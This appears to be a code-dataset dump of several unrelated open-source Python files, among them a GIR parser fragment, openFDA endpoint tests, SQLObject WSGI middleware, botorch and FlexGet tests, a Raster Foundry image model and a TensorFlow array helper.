)
@printable
class Enum(object):
def __init__(self, name, c_name, type, is_bitfield, members, has_nick=False, has_description=False):
self.name = name
self.c_name = c_name
self.type = type
self.is_bitfield = is_bitfield
self.members = members
self.has_nick = has_nick
self.has_description = has_description
@classmethod
def from_tag(cls, type_registry, tag, glib_tag=None):
members = tag.findall(TAG_MEMBER)
name = tag.get(ATTR_NAME)
c_name = tag.get(ATTR_C_TYPE)
type = type_registry.lookup(name, c_name);
if glib_tag is not None:
glib_members = glib_tag.findall(TAG_MEMBER)
return cls(
name=name,
c_name=c_name,
type=type,
is_bitfield=tag.tag == TAG_BITFIELD,
members=[EnumMember.from_tag(*tags) for tags in zip(members, glib_members)],
has_nick=True,
has_description=True,
)
else:
return cls(
name= name,
c_name= c_name,
type=type,
is_bitfield=tag.tag == TAG_BITFIELD,
members=[EnumMember.from_tag(tag) for tag in members],
)
@printable
class Namespace(object):
def __init__(self, type_registry, tag):
def find_enum_pairs():
enum_tags = tag.findall(TAG_ENUMERATION) + tag.findall(TAG_BITFIELD);
c_enums, glib_enums = partition(lambda top: top.get(ATTR_GLIB_TYPE_NAME) is None, enum_tags)
glib_enum_dict = {enum.get(ATTR_NAME): enum for enum in glib_enums}
def glib_from_c(c_enum):
glib_enum = glib_enum_dict.get(c_enum.get(ATTR_NAME) + 's')
if glib_enum is not None:
return [c_enum, glib_enum]
else:
return [c_enum]
return map(glib_from_c, c_enums)
interfaces = [Class.from_tag(type_registry, t) for t in tag.findall(TAG_INTERFACE)]
interface_map = {interface.name: interface for interface in interfaces}
self.name = tag.get(ATTR_NAME)
self.symbol_prefix = tag.get(ATTR_C_SYMBOL_PREFIXES)
self.identifier_prefix = tag.get(ATTR_C_IDENTIFIER_PREFIXES)
self.shared_library = tag.get(ATTR_SHARED_LIBRARY)
self.interfaces = interfaces
self.enums = [Enum.from_tag(type_registry, *tags) for tags in find_enum_pairs()]
self.callbacks = [Callback.from_tag(type_registry, t) for t in tag.findall(TAG_CALLBACK)]
self.classes = [Class.from_tag(type_registry, t, interface_map) for t in tag.findall(TAG_CLASS)]
self.functions = [Function.from_tag(type_registry, t) for t in tag.findall(TAG_FUNCTION)]
class GirParser(object):
def __init__(self, xml_root):
self.xml_root = xml_root
def parse_types(self):
types = []
for namespace in self.xml_root.findall(TAG_NAMESPACE):
prefix = namespace.get(ATTR_C_SYMBOL_PREFIXES)
tag_types = {
TAG_CLASS: GObjectMetaType,
TAG_INTERFACE: GObjectMetaType,
TAG_CALLBACK: CallbackMetaType,
TAG_ENUMERATION: EnumMetaType,
TAG_BITFIELD: BitfieldMetaType,
}
tags = sum(map(namespace.findall, tag_types.keys()), [])
for tag in tags:
gir_type = tag.get(ATTR_NAME)
c_type = tag.get(ATTR_C_TYPE)
MetaType = tag_types[tag.tag]
if MetaType == EnumMetaType or MetaType == BitfieldMetaType:
if tag.get(ATTR_GLIB_TYPE_NAME) is not None:
continue
types.append(MetaType(
gir_type=gir_type,
c_type=c_type,
prefix=prefix,
))
return types
def parse_enum_aliases(self):
aliases = {}
for namespace in self.xml_root.findall(TAG_NAMESPACE):
enum_tags = namespace.findall(TAG_ENUMERATION) + namespace.findall(TAG_BITFIELD)
for tag in enum_tags:
if tag.get(ATTR_GLIB_TYPE_NAME) is not None:
alias = tag.get(ATTR_NAME)
name = alias[:-1]
aliases[alias] = name
return aliases
def parse_full(self, type_registry):
return [Namespace(type_registry, tag) for tag in self.xml_root.findall(TAG_NAMESPACE)]
|
openfda/deploy/tests/foodevent/test_endpoint.py | hobochili/openfda | 388 | 12698388 | from openfda.tests.api_test_helpers import *
from nose.tools import *
def test_consumer_merge():
meta, results = fetch(
'/food/event.json?search=report_number:65420')
eq_(len(results), 1)
event = results[0]
eq_(event["consumer"]["gender"], "M")
eq_(event["consumer"]["age"], "33")
eq_(event["consumer"]["age_unit"], "year(s)")
def test_consumer_merge_with_missing_data():
meta, results = fetch(
'/food/event.json?search=report_number:65619')
eq_(len(results), 1)
event = results[0]
eq_(event["consumer"]["gender"], "M")
eq_(event["consumer"]["age"], "70")
eq_(event["consumer"]["age_unit"], "year(s)")
def test_full_record():
meta, results = fetch(
'/food/event.json?search=report_number:65619')
eq_(len(results), 1)
event = results[0]
eq_(event["date_created"], "20040112")
eq_(event["date_started"], "20031222")
eq_(event["outcomes"], ["Disability"])
products = sorted(event["products"], key=lambda k: k['name_brand'])
eq_(len(products), 5)
eq_(products[0]["industry_code"], "54")
eq_(products[0]["industry_name"], "Vit/Min/Prot/Unconv Diet(Human/Animal)")
eq_(products[0]["name_brand"], "ACEYTL-L-CARNITINE")
eq_(products[0]["role"], "SUSPECT")
eq_(products[1]["industry_code"], "54")
eq_(products[1]["industry_name"], "Vit/Min/Prot/Unconv Diet(Human/Animal)")
eq_(products[1]["name_brand"], "ALPHA LIPOIC")
eq_(products[1]["role"], "SUSPECT")
eq_(products[2]["industry_code"], "54")
eq_(products[2]["industry_name"], "Vit/Min/Prot/Unconv Diet(Human/Animal)")
eq_(products[2]["name_brand"], "CALCIUM CALTRATE")
eq_(products[2]["role"], "SUSPECT")
eq_(products[3]["industry_code"], "54")
eq_(products[3]["industry_name"], "Vit/Min/Prot/Unconv Diet(Human/Animal)")
eq_(products[3]["name_brand"], "MULTIVITAMIN")
eq_(products[3]["role"], "SUSPECT")
eq_(products[4]["industry_code"], "54")
eq_(products[4]["industry_name"], "Vit/Min/Prot/Unconv Diet(Human/Animal)")
eq_(products[4]["name_brand"], "VITAMIN E")
eq_(products[4]["role"], "SUSPECT")
eq_(sorted(event["reactions"], key=lambda k: k),
[u'ASTHENIA', u'DEPRESSED MOOD', u'DIZZINESS', u'IMPAIRED DRIVING ABILITY', u'LETHARGY', u'PHYSICAL EXAMINATION'])
eq_(event["report_number"], "65619")
eq_(event["consumer"]["gender"], "M")
eq_(event["consumer"]["age"], "70")
eq_(event["consumer"]["age_unit"], "year(s)")
def test_sort_by_date_created():
meta, results = fetch(
'/food/event.json?search=date_created:[20170220+TO+20170225]+AND+reactions:OVARIAN+CANCER&sort=date_created:asc')
eq_(len(results), 1)
event = results[0]
eq_(event["date_created"], "20170221")
meta, results = fetch(
'/food/event.json?search=date_created:[20170220+TO+20170225]+AND+reactions:OVARIAN+CANCER&sort=date_created:desc')
eq_(len(results), 1)
event = results[0]
eq_(event["date_created"], "20170224")
|
libs/sqlobject/wsgi_middleware.py | scambra/HTPC-Manager | 422 | 12698389 | <reponame>scambra/HTPC-Manager
from paste.deploy.converters import asbool
from paste.wsgilib import catch_errors
from paste.util import import_string
import sqlobject
import threading
def make_middleware(app, global_conf, database=None, use_transaction=False,
hub=None):
"""
WSGI middleware that sets the connection for the request (using
the database URI or connection object) and the given hub (or
``sqlobject.sqlhub`` if not given).
If ``use_transaction`` is true, then the request will be run in a
transaction.
Applications can use the keys (which are all no-argument functions):
``sqlobject.get_connection()``:
Returns the connection object
``sqlobject.abort()``:
Aborts the transaction. Does not raise an error, but at the *end*
of the request there will be a rollback.
``sqlobject.begin()``:
Starts a transaction. First commits (or rolls back if aborted) if
this is run in a transaction.
``sqlobject.in_transaction()``:
Returns true or false, depending if we are currently in a
transaction.
"""
use_transaction = asbool(use_transaction)
if database is None:
database = global_conf.get('database')
if not database:
raise ValueError(
"You must provide a 'database' configuration value")
if isinstance(hub, basestring):
hub = import_string.eval_import(hub)
if not hub:
hub = sqlobject.sqlhub
if isinstance(database, basestring):
database = sqlobject.connectionForURI(database)
return SQLObjectMiddleware(app, database, use_transaction, hub)
class SQLObjectMiddleware(object):
def __init__(self, app, conn, use_transaction, hub):
self.app = app
self.conn = conn
self.use_transaction = use_transaction
self.hub = hub
def __call__(self, environ, start_response):
conn = [self.conn]
if self.use_transaction:
conn[0] = conn[0].transaction()
any_errors = []
use_transaction = [self.use_transaction]
self.hub.threadConnection = conn[0]
def abort():
assert use_transaction[0], (
"You cannot abort, because a transaction is not being used")
any_errors.append(None)
def begin():
if use_transaction[0]:
if any_errors:
conn[0].rollback()
else:
conn[0].commit()
any_errors[:] = []
use_transaction[0] = True
conn[0] = self.conn.transaction()
self.hub.threadConnection = conn[0]
def error(exc_info=None):
any_errors.append(None)
ok()
def ok():
if use_transaction[0]:
if any_errors:
conn[0].rollback()
else:
conn[0].commit(close=True)
self.hub.threadConnection = None
def in_transaction():
return use_transaction[0]
def get_connection():
return conn[0]
environ['sqlobject.get_connection'] = get_connection
environ['sqlobject.abort'] = abort
environ['sqlobject.begin'] = begin
environ['sqlobject.in_transaction'] = in_transaction
return catch_errors(self.app, environ, start_response,
error_callback=error, ok_callback=ok)
|
sample/sample_get_sqlite_master.py | thombashi/SimpleSQLite | 126 | 12698409 | #!/usr/bin/env python3
import json
from simplesqlite import SimpleSQLite
def main():
con = SimpleSQLite("sample.sqlite", "w")
data_matrix = [[1, 1.1, "aaa", 1, 1], [2, 2.2, "bbb", 2.2, 2.2], [3, 3.3, "ccc", 3, "ccc"]]
con.create_table_from_data_matrix(
"sample_table", ["a", "b", "c", "d", "e"], data_matrix, index_attrs=["a"]
)
print(json.dumps(con.fetch_sqlite_master(), indent=4))
if __name__ == "__main__":
main()
|
common/pickleserializable.py | cganta/dbtest | 130 | 12698426 | """
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
"""
from abc import abstractmethod, ABCMeta
class PickleSerializable():
__metaclass__ = ABCMeta
@abstractmethod
def serialize(self):
pass
@abstractmethod
def deserialize(self):
pass
|
ml3d/datasets/augment/__init__.py | kylevedder/Open3D-ML | 447 | 12698434 | from .augmentation import SemsegAugmentation, ObjdetAugmentation
|
test/utils/test_rounding.py | SamuelMarks/botorch | 2,344 | 12698437 | <filename>test/utils/test_rounding.py<gh_stars>1000+
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
from botorch.utils.rounding import approximate_round
from botorch.utils.testing import BotorchTestCase
class TestApproximateRound(BotorchTestCase):
def test_approximate_round(self):
for dtype in (torch.float, torch.double):
X = torch.linspace(-2.5, 2.5, 11, device=self.device, dtype=dtype)
exact_rounded_X = X.round()
approx_rounded_X = approximate_round(X)
# check that approximate rounding is closer to rounded values than
# the original inputs
rounded_diffs = (approx_rounded_X - exact_rounded_X).abs()
diffs = (X - exact_rounded_X).abs()
self.assertTrue((rounded_diffs <= diffs).all())
# check that not all gradients are zero
X.requires_grad_(True)
approximate_round(X).sum().backward()
self.assertTrue((X.grad.abs() != 0).any())
|
flexget/tests/test_argparse.py | Jeremiad/Flexget | 1,322 | 12698471 | <reponame>Jeremiad/Flexget<filename>flexget/tests/test_argparse.py
from argparse import Action
from flexget.options import ArgumentParser
def test_subparser_nested_namespace():
p = ArgumentParser()
p.add_argument('--outer')
p.add_subparsers(nested_namespaces=True)
sub = p.add_subparser('sub')
sub.add_argument('--inner')
sub.add_subparsers()
subsub = sub.add_subparser('subsub')
subsub.add_argument('--innerinner')
result = p.parse_args(['--outer', 'a', 'sub', '--inner', 'b', 'subsub', '--innerinner', 'c'])
assert result.outer == 'a'
# First subparser values should be nested under subparser name
assert result.sub.inner == 'b'
assert not hasattr(result, 'inner')
# The second layer did not define nested_namespaces, results should be in first subparser namespace
assert result.sub.innerinner == 'c'
assert not hasattr(result, 'innerinner')
def test_subparser_parent_defaults():
p = ArgumentParser()
p.add_argument('--a')
p.set_post_defaults(a='default')
p.add_subparsers()
p.add_subparser('sub')
p.add_subparser('sub_with_default', parent_defaults={'a': 'sub_default'})
# Make sure normal default works
result = p.parse_args(['sub'])
assert result.a == 'default'
# Test subparser default
result = p.parse_args(['sub_with_default'])
assert result.a == 'sub_default'
# Subparser default should not override explicit one
result = p.parse_args(['--a', 'manual', 'sub_with_default'])
assert result.a == 'manual'
def test_post_defaults():
class CustomAction(Action):
def __call__(self, parser, namespace, values, option_string=None):
if not hasattr(namespace, 'post_set'):
namespace.post_set = 'custom'
p = ArgumentParser()
p.add_argument('--post-set')
p.add_argument('--custom', action=CustomAction, nargs=0)
p.set_post_defaults(post_set='default')
# Explicitly specified, no defaults should be set
result = p.parse_args(['--post-set', 'manual'])
assert result.post_set == 'manual'
# Nothing supplied, should get the post set default
result = p.parse_args([])
assert result.post_set == 'default'
# Custom action should be allowed to set default
result = p.parse_args(['--custom'])
assert result.post_set == 'custom'
|
app-tasks/rf/src/rf/models/image.py | pomadchin/raster-foundry | 112 | 12698472 | <filename>app-tasks/rf/src/rf/models/image.py<gh_stars>100-1000
"""Python class representation of a Raster Foundry Image"""
from .base import BaseModel
from .band import Band
class Image(BaseModel):
URL_PATH = "/api/images/"
def __init__(
self,
rawDataBytes,
visibility,
filename,
sourceuri,
bands,
imageMetadata,
resolutionMeters,
metadataFiles,
scene=None,
owner=None,
):
"""Create a new Image
Args:
rawDataBytes (int): size of image
visibility (str): accessibility level for object
filename (str): filename for image (displayed to users)
sourceri (str): source of image
bands (List[Band]): list of bands in image
imageMetadata (dict): extra information about the image
resolutionMeters (float): resolution of image
owner (str): optional owner of image
"""
self.rawDataBytes = rawDataBytes
self.visibility = visibility
self.filename = filename
self.sourceUri = sourceuri
self.scene = scene
self.imageMetadata = imageMetadata
self.resolutionMeters = resolutionMeters
self.metadataFiles = metadataFiles
self.bands = bands
self.owner = owner
def __repr__(self):
return "<Image: {}>".format(self.filename)
@classmethod
def from_dict(cls, d):
bands = [Band.from_dict(band) for band in d.get("bands")]
return cls(
d.get("rawDataBytes"),
d.get("visibility"),
d.get("filename"),
d.get("sourceUri"),
bands,
d.get("imageMetadata"),
d.get("resolutionMeters"),
d.get("metadataFiles"),
d.get("scene"),
d.get("owner"),
)
def to_dict(self):
image_dict = dict(
rawDataBytes=self.rawDataBytes,
visibility=self.visibility,
filename=self.filename,
sourceUri=self.sourceUri,
bands=[band.to_dict() for band in self.bands],
imageMetadata=self.imageMetadata,
metadataFiles=self.metadataFiles,
resolutionMeters=self.resolutionMeters,
owner=self.owner,
)
if self.scene:
image_dict["scene"] = self.scene
return image_dict
def create(self):
assert self.scene, "Scene is required to create an Image"
return super(Image, self).create()
|
research/carls/util/array_ops.py | srihari-humbarwadi/neural-structured-learning | 939 | 12698473 | <reponame>srihari-humbarwadi/neural-structured-learning
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Array related ops."""
import tensorflow as tf
def increment_last_dim(input_tensor: tf.Tensor,
default_value: float) -> tf.Tensor:
"""Grows the size of last dimension of given `input_tensor` by one.
Examples:
- [[1, 2], [3, 4]] -> [[1, 2, 1], [3, 4, 1]] (default_value = 1).
- [1, 2, 3] -> [1, 2, 3, 4] (default_value = 4).
Args:
input_tensor: a float tf.Tensor whose last dimension is to be incremented.
default_value: a float value denoting the default value for the increased
part.
Returns:
A new `tf.Tensor` with increased last dimension size.
"""
input_tensor = tf.dtypes.cast(input_tensor, tf.float32)
inc_tensor = tf.ones(tf.shape(input_tensor)[:-1])
inc_tensor = tf.expand_dims(inc_tensor, -1) * default_value
return tf.concat([input_tensor, inc_tensor], axis=-1)
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.